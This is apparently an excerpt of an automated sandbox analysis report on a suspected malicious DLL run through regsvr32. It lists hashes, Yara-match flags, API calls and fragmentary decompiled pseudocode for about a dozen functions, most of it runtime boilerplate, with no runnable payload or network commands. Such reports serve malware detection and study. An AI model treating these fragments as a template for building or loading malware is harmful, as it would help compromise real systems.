Opcode ID: fde852a4840d2e352ca3eb00ee2f42bd1f44b3ef619014c8955ce582878b56b5
Instruction ID: dc72546e893f52edbc15be444840a7f3f47f43b41a6e0838e28815752b264c6c
Opcode Fuzzy Hash: fde852a4840d2e352ca3eb00ee2f42bd1f44b3ef619014c8955ce582878b56b5
Instruction Fuzzy Hash: 9891477050074A8BDB48CF68C88A5DE3FA0FB58358F65422DEC4AA6290D778D695CFC4

Uniqueness

Uniqueness Score: -1.00%

Function 005DA000 Relevance: 7.7, Strings: 6, Instructions: 154
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

/Q, xrefs: 005DA056
;, xrefs: 005DA11E
F8, xrefs: 005DA125
F, xrefs: 005DA03A
KT, xrefs: 005DA0FA
Z, xrefs: 005DA0BB

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: /Q$;$F8$KT$F$Z
API String ID: 0-1951868783
Opcode ID: 1dba0b1f5f7bf25f1a94850d34f322108ec8c8f6f4ebff0ec6ff6f465611ff96
Instruction ID: cec0054d6640b325be86c1305da6aa9295e4ccf470516d400c32d4c6f2538af9
Opcode Fuzzy Hash: 1dba0b1f5f7bf25f1a94850d34f322108ec8c8f6f4ebff0ec6ff6f465611ff96
Instruction Fuzzy Hash: B96137B0E1470A8FCB48CFA8D48A4DEBBB1FB58314F10821EE846A7290D7749995CFD5

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180010AC0 Relevance: 4.6, APIs: 3, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E00000001180010AC0(long long _a8, intOrPtr _a16, long long _a24) {
				long long _v32;
				long long _v40;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _t15;
				long long _t19;
				long long _t20;

				_a24 = _t20;
				_a16 = _t15;
				_a8 = _t19;
				_v56 = _a16;
				if (_v56 == 1) goto 0x80010ae6;
				goto 0x80010bf4;
				 *0x80022ca0 = _a8;
				_v52 = 0x904;
				_v48 = 0xf9e;
				_v40 = 0;
				_v32 = 0;
				if (E00000001180010DB0(_a16) == 0) goto 0x80010b28;
				ExitProcess(??);
			}

0x180010ac0
0x180010ac5
0x180010ac9
0x180010ad6
0x180010adf
0x180010ae1
0x180010aeb
0x180010af2
0x180010afa
0x180010b02
0x180010b0b
0x180010b1b
0x180010b22

APIs

ExitProcess.KERNEL32 ref: 0000000180010B22

Memory Dump Source

Source File: 0000000C.00000002.327848444.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.327841626.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327892228.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327904812.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327910954.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: e7061396d7e3d43570edbd3d19f5eed90c055825c823b852da9f6b8b51899770
Instruction ID: 35b30a5bd3bbc3bfa3955963e6b6c4c9d1147ff83b5bb424c40f1a31c42fa1fb
Opcode Fuzzy Hash: e7061396d7e3d43570edbd3d19f5eed90c055825c823b852da9f6b8b51899770
Instruction Fuzzy Hash: AE311671119B489AE782DF54F85438AB7A0F7983D4F608215F6A907BA4CFBDC24CCB40

Uniqueness

Uniqueness Score: -1.00%

Function 005CCC14 Relevance: 4.1, Strings: 3, Instructions: 312
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\, xrefs: 005CD130
c2&, xrefs: 005CCD1F
0c, xrefs: 005CCEBC

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 0c$\$c2&
API String ID: 0-1001447681
Opcode ID: 77759940156d6b552e519a0717cd81e7aca00c005acef3af4df6aa899143340c
Instruction ID: f2dfe67fc10f32d869a75a2f74b9859d6f6881d9c9b13402ed627263f8e50fa6
Opcode Fuzzy Hash: 77759940156d6b552e519a0717cd81e7aca00c005acef3af4df6aa899143340c
Instruction Fuzzy Hash: C102E6715083C88BDBBECF64C889ADE7BADFB44708F10521DEA4A9E298DB745744CB41

Uniqueness

Uniqueness Score: -1.00%

Function 005C8BC8 Relevance: 4.0, Strings: 3, Instructions: 213
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

M, xrefs: 005C8F2D
.f, xrefs: 005C8E08
N5, xrefs: 005C8C11

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: .f$M$N5
API String ID: 0-1477915503
Opcode ID: 8d1225c7070edb932c8417e1bce8c420d426fdb0b99d3cf29e08fc417a96cbbc
Instruction ID: a0087405c6f2154bc1e491afc39ea587326e0a1c83834cb72c53182fdd37be15
Opcode Fuzzy Hash: 8d1225c7070edb932c8417e1bce8c420d426fdb0b99d3cf29e08fc417a96cbbc
Instruction Fuzzy Hash: 30A182701197449FD7A8DF28C4C99AEBBF1FB94304F905A1EF8869B2A0CB74D945CB42

Uniqueness

Uniqueness Score: -1.00%

Function 005D8FC8 Relevance: 1.5, Strings: 1, Instructions: 279
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

A]jN, xrefs: 005D9216

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: A]jN
API String ID: 0-1761522205
Opcode ID: 43702ad7ebc926fc841c635a5fc759035faaa4ad2df4e1132c12a3653d9fa51d
Instruction ID: e10e39b0b138c38b21aeb3a527031b6fb939e9f0609398555aab47220bf1da6f
Opcode Fuzzy Hash: 43702ad7ebc926fc841c635a5fc759035faaa4ad2df4e1132c12a3653d9fa51d
Instruction Fuzzy Hash: 92D1E4B1D0060A8FDF58DFA8C48A4AEBBB1FB58304F10462DD556BB290D7785A46CFD1

Uniqueness

Uniqueness Score: -1.00%

Function 005C263C Relevance: 1.4, Strings: 1, Instructions: 135COMMON

Download Yara Rule

Strings

C, xrefs: 005C2836

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: C
API String ID: 0-3705061908
Opcode ID: 762938c9acd95b28f04d4807fb9ee99926cdc57d0bffae28badc71fa18101beb
Instruction ID: af905b6707704c3a16a6f753f414455278f9dc59db53ae239bcdaa1ba4e412d8
Opcode Fuzzy Hash: 762938c9acd95b28f04d4807fb9ee99926cdc57d0bffae28badc71fa18101beb
Instruction Fuzzy Hash: 6861B07151C7848BD768DF28C18A41FBBF1FBD6748F000A1DF69A862A0D7B6D958CB42

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000147C Relevance: 12.2, APIs: 8, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0000000118000147C(void* __edx) {
				void* _t5;

				_t5 = __edx;
				if (_t5 == 0) goto 0x800014bd;
				if (_t5 == 0) goto 0x800014b1;
				if (_t5 == 0) goto 0x800014a4;
				if (__edx == 1) goto 0x8000149d;
				return 1;
			}

0x180001480
0x180001482
0x180001487
0x18000148c
0x180001491
0x18000149c

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00000001800014A4
__scrt_acquire_startup_lock.LIBCMT ref: 00000001800014F6
_RTC_Initialize.LIBCMT ref: 0000000180001524
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000000018000154A
__scrt_release_startup_lock.LIBCMT ref: 0000000180001575

Memory Dump Source

Source File: 0000000C.00000002.327848444.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.327841626.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327892228.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327904812.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327910954.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: f481a242433e045de9421f6a540d64c2f1c4067185df5e2b4ea36506bf633cb0
Instruction ID: c036cf0e1e542974e7afb98f421e14e504817ee7e551922961311e630d73ddb8
Opcode Fuzzy Hash: f481a242433e045de9421f6a540d64c2f1c4067185df5e2b4ea36506bf633cb0
Instruction Fuzzy Hash: 5881C370A04A4DCEFBD7DB65A8413D932A0AB9D7C2F54C125B909477A6DF38C74D8700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180007F30 Relevance: 9.1, APIs: 6, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,0000FDF94EF470F2,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007F3F
FlsSetValue.KERNEL32(?,?,0000FDF94EF470F2,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007F75
FlsSetValue.KERNEL32(?,?,0000FDF94EF470F2,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007FA2
FlsSetValue.KERNEL32(?,?,0000FDF94EF470F2,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007FB3
FlsSetValue.KERNEL32(?,?,0000FDF94EF470F2,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007FC4
SetLastError.KERNEL32(?,?,0000FDF94EF470F2,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007FDF

Memory Dump Source

Source File: 0000000C.00000002.327848444.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.327841626.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327892228.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327904812.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327910954.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: eb8af4af359d96366aaa10eae491533e56ca08d7f11ac2249f998e933b1e40b3
Instruction ID: b3640c739d53f521f3aff5ec24f9b4829142f54ff52cb57a8f227eaee239dcc8
Opcode Fuzzy Hash: eb8af4af359d96366aaa10eae491533e56ca08d7f11ac2249f998e933b1e40b3
Instruction Fuzzy Hash: 72115C3070964942FAEBE32195453F972926B9C7F0F18C625B83A077DBDE68C6498701

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000A234 Relevance: 4.6, APIs: 3, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 48%

			E0000000118000A234(void* __ebp, long long __rbx, long long __rdi, long long __rsi) {
				void* _t25;
				signed long long _t45;
				signed long long _t47;
				long long _t62;
				signed long long _t63;
				signed long long _t70;
				void* _t71;
				void* _t75;
				WCHAR* _t76;

				_t45 = _t70;
				 *((long long*)(_t45 + 8)) = __rbx;
				 *((long long*)(_t45 + 0x10)) = _t62;
				 *((long long*)(_t45 + 0x18)) = __rsi;
				 *((long long*)(_t45 + 0x20)) = __rdi;
				_t71 = _t70 - 0x40; // executed
				GetEnvironmentStringsW(); // executed
				if (_t45 != 0) goto 0x8000a264;
				goto 0x8000a327;
				_t63 = _t45;
				if ( *_t45 == 0) goto 0x8000a289;
				_t47 = (_t45 | 0xffffffff) + 1;
				if ( *((intOrPtr*)(_t63 + _t47 * 2)) != 0) goto 0x8000a270;
				if ( *((intOrPtr*)(_t63 + _t47 * 2 + 2)) != 0) goto 0x8000a26c;
				 *((long long*)(_t71 + 0x38)) = __rsi;
				 *((long long*)(_t71 + 0x30)) = __rsi;
				r9d = __ebp;
				 *((intOrPtr*)(_t71 + 0x28)) = 0;
				 *(_t71 + 0x20) = __rsi;
				E0000000118000A154();
				if (0 != 0) goto 0x8000a2c7;
				FreeEnvironmentStringsW(_t76);
				goto 0x8000a25d;
				E0000000118000B4C4(_t47, 0, _t75);
				_t57 = _t47;
				if (_t47 != 0) goto 0x8000a2e0;
				_t25 = E0000000118000878C(_t47, 0);
				goto 0x8000a2bc;
				 *((long long*)(_t71 + 0x38)) = __rsi;
				r9d = __ebp;
				 *((long long*)(_t71 + 0x30)) = __rsi;
				 *((intOrPtr*)(_t71 + 0x28)) = r14d;
				 *(_t71 + 0x20) = _t47;
				E0000000118000A154();
				if (_t25 != 0) goto 0x8000a311;
				E0000000118000878C(_t47, _t47);
				goto 0x8000a31b;
				E0000000118000878C(_t47, _t57);
				return FreeEnvironmentStringsW(??);
			}

0x18000a234
0x18000a237
0x18000a23b
0x18000a23f
0x18000a243
0x18000a249
0x18000a24d
0x18000a25b
0x18000a25f
0x18000a264
0x18000a26a
0x18000a270
0x18000a278
0x18000a287
0x18000a289
0x18000a291
0x18000a2a0
0x18000a2a3
0x18000a2a9
0x18000a2b0
0x18000a2ba
0x18000a2bf
0x18000a2c5
0x18000a2ca
0x18000a2cf
0x18000a2d5
0x18000a2d9
0x18000a2de
0x18000a2e0
0x18000a2e5
0x18000a2e8
0x18000a2f0
0x18000a2f9
0x18000a2fe
0x18000a305
0x18000a30a
0x18000a30f
0x18000a313
0x18000a341

APIs

GetEnvironmentStringsW.KERNELBASE(?,?,?,?,?,?,?,0000000180006577), ref: 000000018000A24D
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,0000000180006577), ref: 000000018000A2BF

Part of subcall function 000000018000B4C4: HeapAlloc.KERNEL32(?,?,?,000000018000D071,?,?,00000000,000000018000A3A3,?,?,?,00000001800068CF,?,?,?,00000001800067C5), ref: 000000018000B502

FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,0000000180006577), ref: 000000018000A31E

Part of subcall function 000000018000878C: HeapFree.KERNEL32(?,?,00000000,000000018000E6BE,?,?,?,000000018000E6FB,?,?,00000000,000000018000BED5,?,?,?,000000018000BE07), ref: 00000001800087A2
Part of subcall function 000000018000878C: GetLastError.KERNEL32(?,?,00000000,000000018000E6BE,?,?,?,000000018000E6FB,?,?,00000000,000000018000BED5,?,?,?,000000018000BE07), ref: 00000001800087AC

Memory Dump Source

Source File: 0000000C.00000002.327848444.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.327841626.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327892228.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327904812.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327910954.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: EnvironmentFreeStrings$Heap$AllocErrorLast
String ID:
API String ID: 3331406755-0
Opcode ID: 825ce012b9cb48ab94c3413abdd1171c1895b64bc4b61d191bc328906b2b8bd4
Instruction ID: 864329f4ba152f277f2adf48c891db3446df78698e664f4bc60f625a72c2a341
Opcode Fuzzy Hash: 825ce012b9cb48ab94c3413abdd1171c1895b64bc4b61d191bc328906b2b8bd4
Instruction Fuzzy Hash: 64318631608B5881FBA6DF2568403DA7794B78DFD4F48C229FA9A43BD5DF38C6498700

Uniqueness

Uniqueness Score: -1.00%

Function 005D3988 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 105
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE ref: 005D3AF8

Strings

li, xrefs: 005D3A44

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID: li
API String ID: 963392458-3170889640
Opcode ID: df447d1959c748b5d8cf34ebfef7c4b31b83bdbcb52bf56f40cb8f0245456118
Instruction ID: 0a0d5486a303307973cf8d4ea0f92e5f1f3e51b9b4f686e4b80c2b742767c1c1
Opcode Fuzzy Hash: df447d1959c748b5d8cf34ebfef7c4b31b83bdbcb52bf56f40cb8f0245456118
Instruction Fuzzy Hash: F741E77091C7848FDB64DF18D0C979AB7E0FB98315F10495DE488C7295CB789884CB86

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000D26C Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0000000118000D26C(void* __ecx, intOrPtr* __rax, long long __rbx, long long __rdi, long long __rsi, long long _a8, long long _a16, long long _a24) {

				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __rdi;
				if (__ecx - 0x2000 < 0) goto 0x8000d2b4;
				E000000011800086F4(__ecx - 0x2000, __rax);
				 *__rax = 9;
				E000000011800085B8();
				return 9;
			}

0x18000d26c
0x18000d271
0x18000d276
0x18000d289
0x18000d28b
0x18000d295
0x18000d297
0x18000d2b3

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000000018000D297

Memory Dump Source

Source File: 0000000C.00000002.327848444.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.327841626.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327892228.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327904812.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327910954.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: b2bec9f1c83fd2e5dff941a4990122d97467662781677e8ba2cfdbb0e4efa737
Instruction ID: 290c2a04846c9b039a5155463e3184fcb060a742c36b4207bfb39a2b49eb85f2
Opcode Fuzzy Hash: b2bec9f1c83fd2e5dff941a4990122d97467662781677e8ba2cfdbb0e4efa737
Instruction Fuzzy Hash: 3911AC3210468C82F383DF14E8507D9B7A4FB5C7C0F058426FA9547BAADF38CA199B50

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180008714 Relevance: 1.5, APIs: 1, Instructions: 36
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 44%

			E00000001180008714(void* __eax, signed int __rcx, signed int __rdx) {
				void* __rbx;
				intOrPtr* _t22;
				signed int _t29;

				_t29 = __rdx;
				if (__rcx == 0) goto 0x80008733;
				_t1 = _t29 - 0x20; // -32
				_t22 = _t1;
				if (_t22 - __rdx < 0) goto 0x80008776;
				_t25 =  ==  ? _t22 : __rcx * __rdx;
				goto 0x8000875a;
				if (E0000000118000C08C() == 0) goto 0x80008776;
				if (E0000000118000ABF8(_t22,  ==  ? _t22 : __rcx * __rdx,  ==  ? _t22 : __rcx * __rdx) == 0) goto 0x80008776;
				RtlAllocateHeap(??, ??, ??); // executed
				if (_t22 == 0) goto 0x80008745;
				goto 0x80008783;
				E000000011800086F4(_t22, _t22);
				 *_t22 = 0xc;
				return 0;
			}

0x180008714
0x180008723
0x180008727
0x180008727
0x180008731
0x18000873f
0x180008743
0x18000874c
0x180008758
0x180008769
0x180008772
0x180008774
0x180008776
0x18000877b
0x180008788

APIs

RtlAllocateHeap.NTDLL(?,?,00000000,0000000180007F92,?,?,0000FDF94EF470F2,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000), ref: 0000000180008769

Memory Dump Source

Source File: 0000000C.00000002.327848444.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.327841626.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327892228.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327904812.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327910954.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 7cf3c04cd0eb283655c87112c6735f3b789bd4b36bb41325690c7ae62c9b4c65
Instruction ID: 66bea78d34406d615fa8c08e42eaa36a882f8058afe23dfc71e7ff7acb685faa
Opcode Fuzzy Hash: 7cf3c04cd0eb283655c87112c6735f3b789bd4b36bb41325690c7ae62c9b4c65
Instruction Fuzzy Hash: A1F06D74309A0881FED7D7A599003D522D16F5CBC0F2CD4302D4E863DAEE1CC788A320

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001268 Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00000001180001268(void* __ecx) {
				void* __rbx;
				void* _t12;
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t21;

				_t2 =  ==  ? 1 :  *0x80021ae0 & 0x000000ff;
				 *0x80021ae0 =  ==  ? 1 :  *0x80021ae0 & 0x000000ff;
				E00000001180001A80(1, _t12, __ecx, _t17, _t18, _t19, _t20, _t21);
				if (E00000001180002A08() != 0) goto 0x80001297;
				goto 0x800012ab; // executed
				E00000001180006CDC(_t17); // executed
				if (0 != 0) goto 0x800012a9;
				E00000001180002A58(0);
				goto 0x80001293;
				return 1;
			}

0x18000127c
0x18000127f
0x180001285
0x180001291
0x180001295
0x180001297
0x18000129e
0x1800012a2
0x1800012a7
0x1800012b0

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000000018000128A

Part of subcall function 0000000180002A08: __vcrt_initialize_locks.LIBVCRUNTIME ref: 0000000180002A0C

Memory Dump Source

Source File: 0000000C.00000002.327848444.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.327841626.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327892228.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327904812.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327910954.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: __scrt_dllmain_crt_thread_attach__vcrt_initialize_locks
String ID:
API String ID: 108617051-0
Opcode ID: b3a5aff99e9bbd50fc4b4caf8482eddb7f62de2f1dfabb963a32cf9525c58297
Instruction ID: 3927130d99c38a55cbe47f9f4b507d4a3e007974ffcd633e9ac0bb37393e6b58
Opcode Fuzzy Hash: b3a5aff99e9bbd50fc4b4caf8482eddb7f62de2f1dfabb963a32cf9525c58297
Instruction Fuzzy Hash: 66E01A30B0528C8EFEE7E6B525423F937501B1E3C2F40D068B892825838D0947AD5722

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180010A8E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32 ref: 0000000180010A93

Part of subcall function 0000000180014C90: LoadStringW.USER32 ref: 0000000180014CBF
Part of subcall function 0000000180014C90: LoadStringW.USER32 ref: 0000000180014CDC

Memory Dump Source

Source File: 0000000C.00000002.327848444.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.327841626.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327892228.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327904812.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327910954.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: LoadString$ExitProcess
String ID:
API String ID: 80118013-0
Opcode ID: 4511720a80b85894ed9872a941f45ad7e5906891a0c13688ba3e14c3fa3ec101
Instruction ID: b62d2fb12763fda2a64a5ee64e5548852d899a580494aacca0011f8ebade0f7c
Opcode Fuzzy Hash: 4511720a80b85894ed9872a941f45ad7e5906891a0c13688ba3e14c3fa3ec101
Instruction Fuzzy Hash: E1D0C936625A4892E7A29B61F80578A2390B78C7D4F809111A98C42A24CF2CC2098B00

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0000000180014555 Relevance: 216.5, APIs: 144, Instructions: 493COMMON

Download Yara Rule

APIs

ShowWindow.USER32 ref: 000000018001455C
GetLastError.KERNEL32 ref: 0000000180014566
ShowWindow.USER32 ref: 0000000180014570
GetLastError.KERNEL32 ref: 000000018001457A
ShowWindow.USER32 ref: 0000000180014584
GetLastError.KERNEL32 ref: 000000018001458E
ShowWindow.USER32 ref: 0000000180014598
GetLastError.KERNEL32 ref: 00000001800145A2
ShowWindow.USER32 ref: 00000001800145AC
GetLastError.KERNEL32 ref: 00000001800145B6
ShowWindow.USER32 ref: 00000001800145C0
GetLastError.KERNEL32 ref: 00000001800145CA
ShowWindow.USER32 ref: 00000001800145D4
GetLastError.KERNEL32 ref: 00000001800145DE
ShowWindow.USER32 ref: 00000001800145E8
GetLastError.KERNEL32 ref: 00000001800145F2
ShowWindow.USER32 ref: 00000001800145FC
GetLastError.KERNEL32 ref: 0000000180014606
ShowWindow.USER32 ref: 0000000180014610
GetLastError.KERNEL32 ref: 000000018001461A
ShowWindow.USER32 ref: 0000000180014624
GetLastError.KERNEL32 ref: 000000018001462E
ShowWindow.USER32 ref: 0000000180014638
GetLastError.KERNEL32 ref: 0000000180014642
ShowWindow.USER32 ref: 000000018001464C
GetLastError.KERNEL32 ref: 0000000180014656
ShowWindow.USER32 ref: 0000000180014660
GetLastError.KERNEL32 ref: 000000018001466A
ShowWindow.USER32 ref: 0000000180014674
GetLastError.KERNEL32 ref: 000000018001467E
ShowWindow.USER32 ref: 0000000180014688
GetLastError.KERNEL32 ref: 0000000180014692
ShowWindow.USER32 ref: 000000018001469C
GetLastError.KERNEL32 ref: 00000001800146A6
ShowWindow.USER32 ref: 00000001800146B0
GetLastError.KERNEL32 ref: 00000001800146BA
ShowWindow.USER32 ref: 00000001800146C4
GetLastError.KERNEL32 ref: 00000001800146CE
ShowWindow.USER32 ref: 00000001800146D8
GetLastError.KERNEL32 ref: 00000001800146E2
ShowWindow.USER32 ref: 00000001800146EC
GetLastError.KERNEL32 ref: 00000001800146F6
ShowWindow.USER32 ref: 0000000180014700
GetLastError.KERNEL32 ref: 000000018001470A
ShowWindow.USER32 ref: 0000000180014714
GetLastError.KERNEL32 ref: 000000018001471E
ShowWindow.USER32 ref: 0000000180014728
GetLastError.KERNEL32 ref: 0000000180014732
ShowWindow.USER32 ref: 000000018001473C
GetLastError.KERNEL32 ref: 0000000180014746
ShowWindow.USER32 ref: 0000000180014750
GetLastError.KERNEL32 ref: 000000018001475A
ShowWindow.USER32 ref: 0000000180014764
GetLastError.KERNEL32 ref: 000000018001476E
ShowWindow.USER32 ref: 0000000180014778
GetLastError.KERNEL32 ref: 0000000180014782
ShowWindow.USER32 ref: 000000018001478C
GetLastError.KERNEL32 ref: 0000000180014796
ShowWindow.USER32 ref: 00000001800147A0
GetLastError.KERNEL32 ref: 00000001800147AA
ShowWindow.USER32 ref: 00000001800147B4
GetLastError.KERNEL32 ref: 00000001800147BE
ShowWindow.USER32 ref: 00000001800147C8
GetLastError.KERNEL32 ref: 00000001800147D2
